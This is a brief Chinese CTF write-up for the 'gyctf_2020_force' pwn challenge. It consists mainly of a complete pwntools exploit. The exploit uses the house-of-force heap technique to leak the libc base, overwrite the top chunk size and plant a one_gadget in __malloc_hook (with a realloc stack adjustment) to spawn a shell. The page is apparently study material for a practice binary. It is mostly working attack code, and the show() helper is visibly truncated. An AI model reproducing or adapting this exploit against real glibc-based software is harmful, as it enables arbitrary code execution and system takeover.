house of force,realloc 调整栈帧
# 思路
house of force 改 top chunk,劫持 malloc_hook 为 one_gadget 拿 shell
# EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| from pwn import *
r = process("./gyctf_2020_force")
context.log_level = 'debug'
elf = ELF("./gyctf_2020_force")
libc = ELF('./libc-2.23.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
def add(size, content):
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(size))
r.recvuntil("bin addr ")
addr = int(r.recvuntil('\n').strip(), 16)
r.recvuntil("content\n")
r.send(content)
return addr
def show(index):
r.recvuntil("2:puts\n")
r.sendline('2')
libc.address = add(0x200000, 'chunk0\n') + 0x200ff0
success('libc_base'+hex(libc.address))
heap_addr = add(0x18, 'a'*0x10+p64(0)+p64(0xFFFFFFFFFFFFFFFF))
success("heap_addr:"+hex(heap_addr))
top = heap_addr + 0x10
malloc_hook = libc.sym['__malloc_hook']
success("malloc_hook"+hex(malloc_hook))
one_gadget = one_gadget_16[1] + libc.address
realloc = libc.sym["__libc_realloc"]
offset = malloc_hook - top
system = libc.sym['system']
bin_sh = libc.search('/bin/sh').next()
success("system:" + hex(system))
success("bin_sh" + hex(bin_sh))
add(offset-0x30, 'aaa\n')
add(0x10, 'a'*8+p64(one_gadget)+p64(realloc+0x10))
r.recvuntil("2:puts\n")
r.sendline('1')
r.recvuntil("size\n")
r.sendline(str(20))
r.interactive()
|
